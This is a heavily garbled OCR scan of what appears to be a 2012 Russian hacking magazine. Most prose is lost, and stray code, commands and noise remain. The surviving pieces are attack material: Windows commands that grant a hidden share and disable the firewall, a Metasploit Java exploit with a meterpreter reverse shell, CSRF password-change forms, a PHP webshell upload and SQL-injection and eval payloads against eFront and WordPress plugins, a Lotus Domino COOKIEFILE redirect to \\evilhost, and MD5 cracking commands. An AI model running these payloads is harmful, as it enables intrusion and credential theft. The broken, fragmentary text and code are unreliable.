; ....................................... ..
: net share nothing$=C :\ /grant:hacker,FULL /unlim: ited

hacke .

h acke .

: hacke .

...........................................................

: net user username /active:yes /domain


netsh firewall set opmode

disae

wmic product get name /value


wmic product where name="XXX" call uninstall/
nointeractive
rundll32.exe user32.dll, LockWorkStation

- ( , ) ,
.

Windows.

, -

( , ).

( ) .

..........................................................................................:...................................... .

/S

<<GreenDog , Digital Security ltwitter.com/a ntyurinl

MITM

RDP

Iir!!t.:t
.

-
. ,

51 [
RC4 ).

. , ,
,

. ?

, i-. ,

RDP,

. ,

D5- ,

[ . . ). .

: <<

Windows, 2000 [ ). .

~ .

n - ,

TLS .

g:l[ZyAQy).

[gQQ,
RDP MiTM,

, .

6-

. -

man-in-the-middle [MiTM),

Cain&Abel [www. oxid .i tl:

,
, n . ,

11

n ,

21 ARP ARP .
31 n.
L.l : ,

. ,
<< >>

MiTM

RDP.

, , , ,

Siffe S addess.

-, .

51 ap-poisoing .

, : ) .
i

RDP

6- :

. i-

ARP-RDP

RD- .

, , .

Ol ARP - DN S-. , <<

11

. ?

. ,

21
salt ' o. .

31 ,
.

L.l
.

050

. , ,

- longeek ' a

[goo.gi/Embxsl.

RD-,
, .

[goo.gl/pydMZI. ,
,

2003

RPD 5.0.

01 / 156/201 2

EASY

JAVA

,
,

Java,

, . ,
,

Fl ash,

Ja va

J v- .
, ,

. ?

. ? ':]

Java

, . javateste.og/

JavaScipt,

vesio.html .

Jv-,

. , ,

. ? ,
-

CVE-201 0-4452,

Metasploit'e:

l defco- r ussia . u/wa ll. t x t ].


SET [Social gi Too lkit].


B ackTack

l www.social-e g i ee . og].

SET

, .

11 :
use exploit/widows/browser/java_codebase_trust
2) :
set URIPATH test.php
set LPORT 88
3) :
Set payload java/ meterpreter/ reverse_tcp
4) :
Exploit
tt
,

Ja va

:].

. : -

SET

1) Website Attack Vectos;


2) The Java Applet Attack Method;
3) Web Templates [
Site l ];
4) Gmail Gmail;
4) lmp otyouown executae,
.
- . ,
,

Java .

, ? ?

- .

? ?:] ,

, ,

- . ,

. ,

:11,

[ ).

. ,

, ,

- ,

. :

SMTP [25/I

. ,

Gmail

Mail.u.

www.example.com:25l. ,
nmap

, , , , ,

, -

, -. ,

. ?

150

. ,

IP.

UOP

ICMP,

l www . proxy . ru l, ,
.
. , security. nov. u
,
, ,

Proxy server

Use proxy server for your LAN (These settigs will t apply to
dial-up or VPN conections),

. :1
[ * ], [

Address:

Bypass proxy server for local addresses

pro)(y

-25

01/156/ 2012

~['iiiiiiiiiiiiiiiiil]l

Port:

~ 1Advaced ...

051

1EASY

REVERSE-POKC

~ , vs
. ? ,

-, [
) -
. ? . ,
vs-

-,

WAF

SS L- cepepa,

, [,
) .
.
,

[ ,

HP-traceroute.

Squid

reverse proxy

reverse-npoc Wikipedia.org

- ?).
.

vs-

, ,

- . ?

. ,

. ,

GET

POST,
TTL I- .

- .

. ,

- ,

X-F owaded-Fo,

- taceoute. , R -

, ! , -

-,

MaxFowads. ta ceo ut e,

lgoo.gi/VObeW). ,

RFC 2616

1.1,

Fowads . ,

TR ACE

OPTIONS.

RFC,

GET

I- .
:

HTTP-Traceroute.py -t www.victi m.com


GET/POST)

-m

CSRF

(TRACE/

.r\!
L LJ

. GET- an p oc- . ,

S?

CSR F [Coss Site Request Fg,

) . ,

- . ,
,

[, ) ,

[ ,
) . ,
, ,

<form name=passwd action=


"http : //server.com/change_password.php" method="post" >
<input type=hidden name= NP value= new_pass >
<input type= "submit" >
</form>
<script>document.passwd.submit(); </script >

. ,
, n Ja vaSc ipt . ,
- -

anpoca? - XM L- a np oc.

XML-

:)

. .

G- : http://
seve.com/change_passwod.php? NP=ew_pass, ew_pass , . ,
L' :

<iframe src= http ://server.com/c hange_password.php?NP=


new_pass>< / iframe>
,

052

<form name=passwd ENCTYPE="text/plain "


action="http : //server.com/change_password.php"
METHOD="POST" >
<input type=hidden name= '<?xml version'
value= '"1.0"?><User><Password>new_pass</Password></User>' >
</ form>
<script>document.passwd.submit();</script>
, , . ; ) .

01 /156/2012

EASY

!, ,

er..i.r.~t
---

digital

foensicsl- ,
.
,

,-
.
, :

;
n ;

;
DLL- ;
;
;

;
Vitual Addess Descipto;
;
. .

,
, , ,

Volatility 19QQ]L

Hi5ip l. Python'e
Windows ! XPI, , 32- .

n .

imageinfo- ;
f d:\te st.aw- .
Volatility - . ;l
IWinX PSP3x86l,

, n

. , ?

, ,

!
!, , n
. ,

volatility pslist -f d:\test.raw

--profile=WinXPSPx86

MoonSols Dumplt ihttp://goo .gi/BY1QN J.

, , :

- :
.

volatility netscan -f d :\test.raw

--profile=WinXPSPx86

. , n ,

! ,
USBI.
, - ?

Volatilit y.

, Python'o,

- , ,
,

SAM, -
LSA?
Windows .

stndln- , .
, :

volatility.exe imageinfo -f d: \test .raw

volatility hivelist -f d:\test.raw

hivelist-

--profi le=WinXPSP x86

,
:

volatility hashdump -f d:\test.raw


- ls -s exelsese

--profile=WinXPSPx86

hashdump-
103560- System;
s 180560- SAM.

, . ,
. ,

, .

Volatility.

01 /156/2012

053

[ivinside.iogspot.coml

[115612, . , .11

Microsoft Office 2007

Excel.xlb

CVSSV2
111111 111 11 11 11111 1111

9.3
111 11

IAV: N/AC :M/AU: N/C:C/J:C/A:C)


[]]
:

5 2011 .
Aniway, abysssec, sinn, juan vazquez.
CVE: CVE-2011-01 05.

n ,

. ,



, ,

Excel.

f:J!Iii

Excel

, ,

051,

! , ).

xl b.

01 / 156/ 201 2

start () ;

(CLASS SESSION ACTION ) ;


SsessionAction = - Sessi~nAction () ;
SselectedDocuments = SsessionAction ->get () ;
if( removeTrailingSlash ($sessionAction ->getFolder ())
&& sizeof ($selectedDocLJments ))

==

getParentPath ($ POST [ ' id ' ])

if(($ key = array search (basename ($ POST [ ' id ' ]) , $selected0ocuments )) !== false )
{

$selected0ocuments [$key ] = $ POST [ ' value ' ] ;


$sessionAction -> set ($selectedDocuments ) ;

}
baseame ( $ POST [ ' icJ ' ]) . "\n ";
displayArray ($selectedDocuments ) ;

-- removeTrailingSlash ($ POST [ ' id ' ]))

} elseif( removeTrailingSlash ( $ sessionActio -> getFolder ())

POST [ ' id ' ]) ;

S sessionActio -> setFolder ( $

writelnfo (ob get

l ()) ;

ajax _ save _name .php

BIFFB.

Bl FF-

BOF

Visua l Basic module


Works heet
Chart
BIFF4 Macro sheet
BIFF4 Work book globals

= workbook globals

Workbook globals

BOF

7.
,

EOF
BOF

worksheet
Sheet records

sub _3 0199E55.

EOF
BOF

= worksheet
Sheet records

, ,
,

EOF

.text:esF8e
.text:e5F835

ID

.text:e5F838

( )

sz

( )

.text:e5F844

.text:e5F849

(ID ] - .

.t ext:e5F84 F

. text:e5F856

: BOF IBegi Of File] EOF IEd Of Fil e].

.text:e5F858

.text:e 5 F85E

BOF, :

.text:e5F862

.text:e5F867

BOF , BIFF8
.

2
4

12

~;

. text:e5F869

2
2
2
2
2
2
4
4

89

ID

.text : e5F86A

01

. text:e5F86C

f'

.text:e5F86E

***.fc H

. text:e5F86F

ID

.text:e5F872

call su_11
mov , [ebp+var_EDC]
imul , [ebp+var_Fee]
mov edi,
mov , [ebp+var_EEe]
lea , [ + + ]
call su_ l
push eFFFFFFFDh
edx
sub edx,
add , edx
push ; Dst
push ; int
mov , edi
call sub_e199E55

F-:

.text:e5F87e

.text:e5F83E jz l_54488

(sz

call su_11
cmp , h
mov [ebp+var_ED4] ,

Excel,

sub_30199E55

,
. ,
.

- Workbook globals

01 /156/2012

055

static
checkFile ($name ) {
if ($GLOBALS [ config uration
file k list l ] !=
$ acklist = explode (" , ", $GLOBALS [ configLJration
} else {

puic

11

][

$ acklist

}
$ acklist

[]

{
1

1
][

file

list

1
]);

= ();

= pt1p
1

1
;

$extension = pathinfo ($name , PATHINFO_EXTENSION );


foreach ( $ acklist as $value ) {
if ($extension == trim (mb str-tolol..rer ($valL1e ))) {
throw
EfrontFileException (_YOUCANNOTUPLOADFILESWITHTHISEXTENSION .
.$extension , EfrontFileException : :FILE IN BLACK LIST );
1-

CheckFilell

.text:30199E0

.text:30199E4

-. n

cmp edi, [e sp+4+Dst]


ja loc_303EE1B7
.te xt:30199 E A mov , [esp+4+arg_0]
.text:30199EE push
.text:30 199E F mov , dword_30F72C0
. text:30199E75 push
.text : 30199E7 mov , nNumberOfBytesToRead
.text:30199E7C push esi
.text:30199E7D mov [esp+ l0h+Dst],

, n

.
, .

memcp y,

nepen

, / GS . ,
esp .
,

ca ll esp .
mov , [esp+l0h+Dst]
push esi ; Size
lea edx, dword_30FEB8[ebx]
push edx ; Src
push ; Dst
sub edi, esi
call memcpy
add [esp+lCh+Dst], esi
add , esi
.tex t :0 199EAD add esp, 0Ch
.text:30199EB0 test edi, edi
.text : 30199EB2 mov dword_30F72C0,
.text:30199EB8 jnz loc_301E0DB

. text:30199E93
.text:30199E97
. text:30199E98
.text :30199E9E
.text:30199E9F
. text:30199EA0
.text :30199EA2
. text:30199EA7
.text:30199EAB

i(.1;ldfifi
Microsoft Office Excei2007/ Microsoft Office Excel2007 SP 2.

,_i,J!IiitJ:I
, .

MS11-077 Win32k Null Pointer De-reference


Vulnerabllity
~2

CVSSV 2

11111

111111 111 111 11 11111

[AVL/AC:L/Au:N/C:C/1 /)

1]]
,
.

: 22011 .
:

KiDebug.
CVE: CVE-2011-1985.

/ GS / SAFESEH . , /GS-

wi n32k.sys ,

MS Visual Studio,

, .

>> n.

,
.

IJ34!Jii

cookie,

.
64-

, ,

coo kie. , ,
. -

. /S AFESEH
S- .
,
, n

. ,

. Visual Studio

/ SAFESEH

056

.text:BF9140C0 ; _stdcall NtUserfniNCBOXSTRING(x,x,x,x,x,x,x)


.text:BF9140C0 _NtUserfniNCBOXSTRING@28 proc near
CODE XREF: xxxDefWindowProc(xJx,x,x)+E [ p
. text:BF9140C0
NtUseressageCall(x,x,x,x,x,x,x)+l[p
.text:BF9140C0
.text :BF9140C0 WND
dword ptr 8
. text :BF9140C0 arg_4
dword ptr 0Ch
.text:BF9140C0 arg_8
dword ptr 10h
.text:BF9140C0 arg_C
dword ptr 14h
.text:BF9140C0 arg_10
dword ptr 18h
dword ptr lCh
.text:BF9140C0 arg_14
dword ptr 20h
.text:BF9140C0 arg_18

01 /156/2012

- BSoD:

RETURIJ t o

EXCEL . O II OEE

frooo

f:L .7

14

CB_SELECSTRING

exe14D

CB_FINDSTRINGEXACT
LB_ADDSTRING
LB_INSERTSTRING
LB_SELECTSTRING
LB_FINDSTRING
LB_FINDSTRINGEXACT
LB_INSERTSTRINGUPPER
LB_INSERTSTRINGLOWER
LB_ADDSTRINGUPPER
LB_ADDSTRINGLOWER

1s

14

14

11
1

exelBF
12

exelAA
l
1

exelAD

.,.,,Jdjfi

.text:BF914ece
.text:BF914ece
.text:BF9148C2
.text:BF9 14eC

. text : BF9148CS
; WND
.text:BF9148C8

CB_ADDSTRING
CB_INSERTSTRING
CB_FINDSTRING

==

mov
edi, edi
push

mov
, esp
mov , [ebp+WND)
exffffffff (-1),
mov , [ecx+2eh )

Windows SP3/XP SP2 64, Windows 2003 Sv SP21+ itanium,x64l,


Windows Vista SP2/ SP2 64 , Windows Sv 2008 SP2 32/64/
itan ium, Windows 7 32 / 64 , Windows 7 SP1 32/64, Windows Sv
2008 2 x64/i tanium, 2 spl x64/itan ium .
BSOD

f"jJ!IijiJ:I
MSll-077, .

NtUs e MessageCall NtUsefniNCBOXSTRING


, CB _ ADDSTRING:

.text :B F88 EE6B ; i nt __stdcall NtUserMessageCall(int,


int, int UnicodeString, PVOID Address, int, int, int)
.text:B F88EEB1
push
[ebp+arg_18)
; int
movzx
, ds:_MessageTae[eax]
.text:BF88 EEB4
push

int
.text:BF88EEBB
[ebp+arg_le)
int
.text:BF88 EEBC
push
. text: BF88 EE BF
and
, Fh
. text : BF88EEC2
push
[ ebp+Address]
Address
.text :BF 88EECS
push
[ebp+UnicodeString] ; int
. text: BF 88E EC 8
push
[ ebp+arg_4]
; int
. t ext: BF 88EECB
push
esi
; int
. text : BF 88E ECC
ca l l
ds:_gapfnMessageCall[eax*4 )
; NtUserfniNSTRINGNULL(x,x,x,x,x,x,x)

Wordpress

Zingiri Web Shop Plugin

CVSSV2
11111111 1111 11 11111111 1

~5

1111 111 1

I:N/ AC:L /Au:N / C: / 1: P/ A:PI

l1

WodP e ss
.
, ,

.
- -,-


,
.

Egidi o Romano aka EgiX . EgiX


13 ,
,

. rdat a:BF998D68 _gapfnessageCall dd offset _NtUserfnNCDESTROY@28


.rdata :BF998D68
; DATA XREF: NtUseressageCall(x,x,x,x,x,x,x)
. rdat a : BF99eD68
; NtUserfnNCDESTROY(x, x,x,x,x,x,x)
.rdata : BF998D6C
dd offset _NtUserfnNCDESTROY@28
; NtUserfnNCDESTROY(x,x,x,x,x, x,x)
.rdata:BF998D7e
dd offset _NtUserfniNLPCREATESTRUCT@28
; NtUserfniN LPCREATESTRUC(x,x,x,x , x,x,x)
. rdat a: BF998DD4
dd offset _NtUserfniNCBOXSTRING@28
; NtUserfniNCOXSTRING(x,x,x,x,x , x,x)

IJ:J4!Jii

/fws/addons/
t i m e/j sc i t s/t i _ m 1 1u g i s/ j f i 1 ma g 1 j _ s ave _
name.php, 37-56
.

$selectedDocuments POST - value.


$selectedDocuments
displayAayll witelnfoll,
, $selectedDocuments.
witelnfoll , /fws/addons/

t i m /j s i t s/t i _ m / 1u g i s/ j f i 1 ma g 1 j _ t _

folde.php:

SendMessageCallback((HWND)- l ,CB_ADDSTRING, e, e, e, e );

function writeinfo($data, $die = false)


{
$fp = @fopen(dirname( __ FILE __ ) .
DIRECTORY_SEPARATOR . 'data.php' ,
@fwrite($fp, $data);

SendNotifyMessage((HWND)- l ,CB_ADDSTRING, e, e );

01 / 156/201 2

'w+' );

057

i f ($_POST[ 'templateName' ]) {
$dir = ' .. / . / .. / .. /content/editor_templates/' .
$_SESSION[ 's_login' ];
i f (!is_dir($dir) && !mkdir($dir, 8755 )) {
throw new Exception(_COULDNOTCREATEDIRECTORY);
$filename = $dir. '/' .$_POST[ 'templateName' ]. '.html' ;
$templateContent = $_POST[ 'templateContent' ];
i f (file_exists($filename) === false) {
$ok = file_put_contents($filename,
$templateContent);
chmod($filename, 8644 );

GetUserTimeTargetll

, file_put_

contents() $_POST[ 'templateName' ] $_


POST[ 'templateContent' ] , . ,

@fwrite($fp, "\n\n" date( 'd/M/Y H:i:s' ) );


@fclose($fp);

, ,

!

data.php,

php,
magic_quotes_gpc. ,

, :

-.

ex pl oit- db .co m

!EDB-10: 18111].


.
,
, :

11 Arch Li nux
# pacman -5 php
/ / Debian- ba sed
# apt-get install php

POST /efront/www/editor/tiny_mce /plugins/


save_template/save_template.php /1.1
Host: localhost
Content-Length:
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
templateName=sh.php%ee&templateContent=
< ?php evil_code(); ?>
2. .
checkFile[], /libaies/filesystem.
class.php, 3143-3154

. FileSystemTee::uploadFile!l,
, hkFil[]

$ php 18111.php <host> <path>

. , ,
<host>- ,

<path>- WodPess.

file_ack_list,

Joomla!, -
CONFIG_SYS_ROOT_PATH.

if1;1d:Jfi

php, php3, jsp, asp, cgi, pl, , ,


bat.
php.

3. SQL- UPDATE.
getUseTimeTaget[], /libaies/

Wodpess Zigii Web Shop Plugin 0.9.12 2.2.3.

tools.php : .

fil!iijiB'

'

2.2 .4 .

package_l ,
$entity. , /www/
peiod ic_ u pdate.php:

eFront
~5

CVSSV2
111111 1111 111 11 111111

1111
[AV: N/AC:L/Au: N/C:P/1: /:]

IIJj]
EgiX

eFont.
,

, .

f:JQ!Iii
1. .
/www / d i to /t i ny_ m / 1ug i s/save _ te m 1 te/s ave _ te m 1 te. h
! 8-18]:

058

i f ($_5ESSION[ 's_login' ]) {
$entity = getUserTimeTarget($_GET[ 'HP_REFERER' ]);
//$entity = $_5ESSION['s_time_!arget ' ] ;
//Update times for this entit y
$result = eF_executeNew( "update user_times set time=time+("
. time().
"-timestamp_now),timestamp_now="
. time().
"lr.tlere session_expired = and session_custan_identifier =
$_5ESSIDN[ 's_custom_identifier' ].
"' and users_LOGIN = '" .
$_SESSION[ 's_login' ].
"' and entity = '" .
current($entity).
"'and entity_id
key($entity).
"'" );

01 /156/2012

, $_G['_REFERER'],
getUseTimeTagetl l ,

eF_executeNew ll . ,
SQL- URL
:

http:/ / localhost/efront/www/periodic_updater.php?
HTTP_REFERER=http://host/?package_ID=[SQL]

$_SERVER('HP_REFER ER '], , -,
.
.

4.

/www/index.php:

if (isset($_COOKIE[ 'cookie_login' ])
&& isset($_COOKIE[ 'cookie_password ' ]))
try {
$user = EfrontUserFactory :: factory(
$_COOKIE[ 'cookie_login ' ]);
$user - > login($_COOKIE[ 'cookie_password ' ], true);

$_COOK IE ['cookie_login'J.

EfontU serFactory::factoyll,
,
:

GET /efro nt /www/index.p hp /1.1


Host: localhost
Cookie: cookie_login=admin;cookie_login=1;cookie_
login=administrator;cookie_login=1;cookie_password=1
Connection : keep-alive
5.

-.

/www/s tudent.php:

if (isset($_GET[ ' course' ]) 11


isset($_GET[ 'from_course' ]))
if ($_GET[ 'course' ])
$course
else {
$course

new EfrontCourse($_GET[ 'course ' ]);


new EfrontCourse($_GET[ ' from_course' ]);

$eligibility = $course - > checkRules(


$_SESSION[ ' s_login' ]) ;

WEXLER.BOOK ESOOl
2033 ~
WEXLER

, $_GET['couse'] $_GE[ 'from _


couse'J.

EfrontCourse,

evalll :

/s tudent.php?lessons_ID=1&course[id]=1&course
[directions_ID]=1&course[rules]=a: 1 :{s: 19 : "1];
phpinfo();die; /* " ;a: 1 :{s: : "lesson" ;i : e ;}}

if.1;1dJt1

Ft <= 3.6.1 [build

119441.

,_1,J!Iii[I:J
. ::::

01 /156/2012

WI!XLI!.

www.wexler.ru

pilifijij

: 8 (800) 200 96 60

[iog.chivavas.org[

I
4850
2 n
2,2

!

Radeon

bjt.Jy/yEhdi

RainbowCac k n
n ! .

bjt.[y/viSB9K -

n
~>

MD5

MD5.

,
. -,
,


,
.

, ,

MD5.


:
,
. ,

.

. -

l
l
, . .

MD5

MD5.

1 28-

. , 1 28-
, .

1991
MD4 .
1992 RFC 1321. MD5
, CMS
-

- SS L-.
,

1993

MD5

, . ,
1996-, ,

MD5.

SHA1 [

, ,

SHA21 RIPEMD-160.

MD5 1 2004 .
MD5CRK -

CetainKey Cy ptosystems

.
- .

24 2004

, - ,

01 /156/20 12

~ '(

,,
'"''- "

f 1H

LJJ

11:'

;,.

.,

' 'jiJI:fl(,(;

;t

, JII

,J,J

(.,J

.,,

."

t:' l

'!

'' '1'

14

,,

1;

Cl~

., w
'11

-~

'-,t,

Loto

11

1)/

'/

!:!1

~ 1

t-~-

.JH

~i

..ili

Ul

".,

l;f,

t,

,-,.,"

l:f,

1:-'

j,

11

1-'

1/

l; fj

:'

~.-

Jl

.~.

.,

,, ,j

''11~ ::-
..

,.,.,,,,,,,

w
., ~
,.,j

: :t

::,

~~

1_1 1

,/

;,

tH

'"

t- ~.

,,

: :-;

'1;

HIIL,

<i !" :l

. 1

~. -

l't
/ 1

: I'J

/1

41

,,,

. ,

'"

1' /

. -

f lf,
/IJ

1'<

;t .

l,'i

'1,

41.1

"4

t,::

~-

,,.,

1::

.'

-;;

~ -

11!

t.tl

IJ1f

'1

I 'J

31

,,,

''

11

;;,,

/1>

1!1.1

Keccak

Skein.

2008

NIST

SHA1 SHA2.
BLAKE, Gostl, JH,

' j~:

,,j

1''1

.,,;

-;,.

:1 '1

::

Ui

:''

"'-; ,

/1

11

11

~~

t.'J

ol1
f lf,

1'1
c 1J

'
~
,_,,

,,.;

lof,

111.

~'11

(Jrj

,,.

. ,

''

f';

/1>

- : d8578edf8458ceefbc5b76a

t,.,

1<1
J

4~

' !1:

':

tl:

),J

-~
,,.,

/'.-'

, -

f lt,

<4
4
l oJ
f o<l

::/

,,,,

.,,

1J'1

t ..t

oJI!
ibl

t.'1

\!

::;

4;

~; 1

f:,J

00

ili

-;-;

'

: t

1 -~'

1.'

IJ'I

(Jf,

<11

~ r .1 ~

''

. ,,

"' "

MD5

,, ..

/'HJ~,.1,.J;,;L, 1 ,t t. t.,;,,,,.

;;

1)1}

-~

GHASHGPU:

GPU

5854.

1:;,,,,f '1 t .1

lghashgpu,

www.golubev.com

DS-

.
xe a , lghashgpu

GPU,

Vid ia ATI CUDA/

ATI Steam . n
, CPU,
.

GPU ,

. , :

Windows:

ighashgpu .exe -t:md5 \


-h:d8578edf8458ceefbc5b6a58c5ca4

-max:7

MDS

MD5.

- [qwetyl.
,

, - ,

. dllfd4559815b2c3delb685b

86283, , ,

<<_admi .

IBM 690 [ ,

, :

].:-] 2005
.

ighashgpu.exe

. 509

-u:[abcdefghijklmopqrstuwvxyz1234567890_]

-h:dllfd4559815b2c3delb685b8a6283

-t : mdS

-m:??????_admi

, .
,

.
.

2006

2006

'-u'

, !

2008

'-m'

<<_admin >>.

Chaos Communication Congess


. 509.

MD5.

2007 ,
Sony Pla yStat io MD5.
: 1,4 D5-
! , 2009-, BlackHat
USA GPU ,

, -

n ,

n .

. ,
. ,

2011 IETF RFC 1321 [MD51


RFC 2104 [HMAC-MD51 . RFC 6151.
MD5

<< ,

. ,

- , .

<< - ,

MD5 . ,

MD5

, ,

. ,
, .

01 /15612012

061

- -

..

l! ~t b

Pl l illtt llt

Pl t 1ntt rt1DI!tr

~ 16(t6)c: t 0 t1t.72fOc:t !d6 ~ c:99 !110

11t4.S:p.fi

fit65343561E e 36

blj bb7a!45140 ~ 503t ! 3ecc:Et!tt533bll

HHfi!74756!

R.) bHc:07bc:073 !1 !5t!!1Hd1 5H841tb

49 !.:61

70 3(39"'~""

0 o~ t70c:6datd72c:561at7dsttc:t o 6c!sl
ftl 7 !I)t2fd1422 12C.H99!d05ttt8b9 H

oe ~ htp2
d0 4:ny2V

306534!147032


- ,

pltintt rc:ot 16Et6Sc:t041 a72!0c: t!di79 !c:99 fd0 1s de45;:'16


pltltlttltt of 7t!45H 0450b3 1 !38c:c:6!!t ~533bl t 11 dHh t UO
pl l iflttat c f bH c:0~013f i 85 1 8!4!dt SH84ltb is p49! r.67
pl a illte t ot 02470<:6td!9d72c367 t 47d3!! c906d51 1s 04!4htp2
dilk: C: \ rtiCC:rtclr-l . S-\/1nS2\I:dS_lcoo.-e :tl ~!': l -fi..:Uric:tl-7_0_20001975054~9_0 .:t: 7800 43904 b..,::t 3 :t!&d

set rc:htn; forlhash ...


plt1nttlt of 1 t:2fd1H2 a 2c:4!99!d 0 5 e e!b944 11 dOt1r.yav

126
ASCII, 63 527 879 748 485 376 . 254
17 324 859
956 700 833 536, 2,7 ,
. , ,
. ,

d11t:thttld&orted

, .
pl&1nt t ztfound:
tOt&ltillle:
tio!chaint:a"-er,e:
ti:r.to!a lanzcect:

2.e9t
0 .54 s

1.03
ttuo!othe :opcrat1on:
tUoe: ot di1Jr n ad:
ha ' h ' redu.c:e c:aleul at 1ono! d'la1ntraver se:
h as h ,

0.01\
~.~3

99!

r t ductc: a lcul at ionofalar:~d'leclt:

7!

t pet do:ch aintrav.rte :


IPf't do!alarllchea:

3. 46

ll!illi~nl

4.1161111lli!!ll/ l

MD5

,
.

ecrypted.dat

. 80- ,

IGHASHGPU:

, 640 1 ,

. ,

. ,

. ,

cOOI:

2003 , , ,

f48494761d277762

f2da2e2a5a215b66995de1f9327dbaa6
c7f7a34bbe8f385faa89ae4a9d94dacf

-.

9478151927242f5

- << >> .

eea931d3facaad384169ebc31d38775c

49d854799ff9f8458

- [ ,
encypted.dat lghashgpu
:

64 ).
, .
. ,

ighashgpu.exe -t:mdS -u:[abcdefghijklmnopqrstuwvxyz123456789e_]


-m:??????ceel encrypted.dat


. ,

.
lghashgpu
ighashgpu _ esults.txt :

, n <<>>
. .
, n

feb46ac8494761ad2eaa7776c2a:1rootxceel

. ,

f2da2e2a5a21Sb6699Sde1f9327dbaa:pwd12xceel

c7f7a34bbe8f385faa89ae4a9d94dacf:pwd34yceel

. << >>

ccb9a4e7eBa151ec927e242feacS:pwd56yceel

4966d8547ccee99aeffe9f6845Be:pwd9Bzceel

eea931d3facaad384169ebc31d38775c:pwd78zceel

, .

IGHASHGPU:

n n>> .
, :

var plain = password + "s41t" ;


var hash = mdS(plain);
: 42151cf2ff27c5181bb36a8b
cfafea7b.
lghashgpu << >> <<-asalt >>:

ighashgpu.exe -h:42151cf2ff27c5181bb36a8bcfafea7b \
-t:mdS -u:[abcdefghijklmnopqrstuwvxyz123456789e_] \
-asalt:s41t

RainbowCack l poject-a i nbowcack . com ) ,


Windows,

RAINBOW TABLES
<< >> - ,

062

85-99%.

01 / 156/ 201 2

MD5

Linux . n : LN /
NTLM, MD5 SHA1. ,
- .
<<

MD5.

n: , ,
. n n F

Rainbow

s [ f eea i bow t aies.co m ) . , n


,

,
>> .

MD5, SHA1, LM

NTLM.

,
>>

. :

SHA1-

200

LN/NTLM, MD5

.
tg, RainbowCack. n
:

hash _algo ithm-aop

[LM, NTLM, MD5

SHA1);
chaset- ,
c haset . txt;
plaite xt_le_m i

plaintext_len_max-

tae_idex, chain_le, chain_um t_ind-

, [it.ly/dT8M).
n:

1.

tae_index- >> ,
.

, .

2.
3.

chain_le- n .

>> .

hin_um- n .

n .

4.

pat_index-o , .

MDCa ck, CPU [


).
GPU [nVidia GeFoce GT 220), CPU [lntel Atom N450,

0).

>>

MD5:

) ~

GPU

CPU

4
5

ee:ee:el

ee : ee:el

::l

::

: :9

: :l

::l

ee:es:21

: : 1

. ltel

ee::ll

9:27:52

::4

rtgen.exe md5 loweralpha-numeric 1 7

zeee

9755489

Atom N450
:). md5_
lowealpha-numeic#1-7_0_200097505489 _.t 1,5 .
,

,
,

GPU

CPU

>> .

. n

tsot.exe:

rtsort.exe md5_loweralpha-numeric#l-7_e_zeeex975e5489_e.rt

. ,

4-

5- ,

n .
l

. :

. ,

d8578edf8458ceefbc5ba58c5ca4. cack_gui.exe

- .

Add Hash ...

File .

. >> .
Seach

Rainbow s ...

Rainbow .

md5_loweralpha-numeric#l-7_e_zeeex975135489_e.rt,
Open. n !
.


.
- , ,

MD5

SHA1.

SHA2 S
[ ). - ,
.

VS. CPU VS. GPU

, ,

>> .

lghashgpu

- ,

n D5- , ,

. ,

RainbowCack

01/156/2012

100 %,

. ::::

063

EJ
RDP

Plugtns
ots tist

Ftles

.-6

setttnas

Hack the Planeti

Spy

....
f! Anti.&i..Rud
FF -binjW:

Op<tr fongnobbo

Ch rom formgibet~

Spy

...,

Installer
---------- conflo.php

- - - - - - -- - - - - - ,

ll'!y5QL

( forCP):

lnl itle :~CN" "Your JavaSctipt ls tumed off. Please, enaieyoo


>o:::'c:J:::s_

---:--'=:...:;:=

,. .,...., ._~ID.ot--1
~ - ( III..">!.J18)' )

YDUI"Javakrlplla

lwodorf. PI8aaa , a~.yowJ&.,...a , a"*~~..-: con .

to[y- e.-ano,t;rt~ -Co~"'",..JI*""'

....-.

~ ( IINI8t1o011!YC.I'P8"'"'Y )
YowJavaScriptl8t.. .,.dofi . Piea , anablly-JS

~h l

P18a. an111

-~ntf -CO<N~---

~ - I I1>811nl:ti'J'~"J' (
Y-JavaSc.pel8t,.Ndotf. PI8"a, ana.

v-Js

Plea , e~~terp.~oword

WWWI'IDVI\1 ~ l ,twJt,oonl

intitle:"CN" "YourJavaSaipt ls tumed off. Please.

e~bl!_~ ~

Digital Security ltwitter.co m/asin tsovl

Lotus,

IBM Lotus
Domino Server
-

IBM Lotus
Software,

IBM Lotus

Notes.

www. zerodayiitia

tive.com - ZDI;
www:ii)m.com/software/ru/lotus/ -IBM
Lotus Software;
buatraq.ru - BugTraq;


LOTUS DOMINO CONTROLLER

dj.navexDress.com -

DJ Java Decompiler.

, ,
,

.

.

IBM,

.
, ,
. .

Lotus

Lotus.

: , , . . ,

, .
.
- ,

.: ]

,
.

, ,

, .

Lotus

CVE-2011-1519

[ , ]. ,

. : ]

- , ,

ames.nsf - .

, ,

8.5.2FP2.

exploit-db.com

Lotus

ZD I ZDI-11-110,
Oday ( ].

<<

Lotus Domino S v

tll.

BugTaq ,

ZDI,

IBM suit-

, -

2050.

, ,

COOKIEFILE,

068

01 /156/20 12

Lotus,

fotunec i ty. com/neshkov/dj . htm l l, j- :\

gm Files\IBM\Lotus\Domino\Data\domino\java\dconsole.ja

UNC,

n Jv- .

. ,

, NewCiient.class,

SYSTEM>>.

~ COOKIEFILE

, \\evi lhost\passwod _coo kie_file,

11 sl-

i f (sl.equals( "#EXIT" ))
return 2;

, ,

2ese/tcp

i f (sl. equals( "#COOKIEFILE" ))


i f (stringtokenizer.hasMoreTokens())

11
, ,

2050.

// #COOKIEFILE < n >


cookieFilename = stringtokenizer.nextToken().trim();
return 7;

, Lotus .
.
, .

, ,

i f(! l.equals ( "#UI" ))


i f(stringtokenizer .hasMoreTokens())
11 ...
usr = stringtokenizer.nextToken( "," ).trim();
i f (usr == null)
return 4 ;
i f(stringtokenizer.hasMoreTokens())

,
nmap.
Ltus-,
, ,
.

11
socket:reconnect_ssl()

pwd = stringtokenizer.nextToken().trim();
return ;

socket:send( "#API\n" )
socket:send( ( "#UI %s,%s\n " ):format(user,pass)
socket:receive_li nes( l )

.
:

socket:send( "#EXI\n" )

/*
, Ltus-

*/

do {

: SSL- ,
#>>. ,

/ / ReadFromUser-
int i = ReadFromUser();

admin pass
#UI admin,pass.
, ,

nmap

COOKIEFILE . ,

i f (i == ) { // #APPLET
appletConnection = true ;
continue ;

, #COOKIEFILE \\evil\
file. , ,
[ ,

! .

userinfo = UserManager.findUser(usr);
i f (userinfo == null) {
/1 . .. !
WriteToUser( "NOT_REG_AOMIN" );
continue ;

. ,

Java, IDA , -

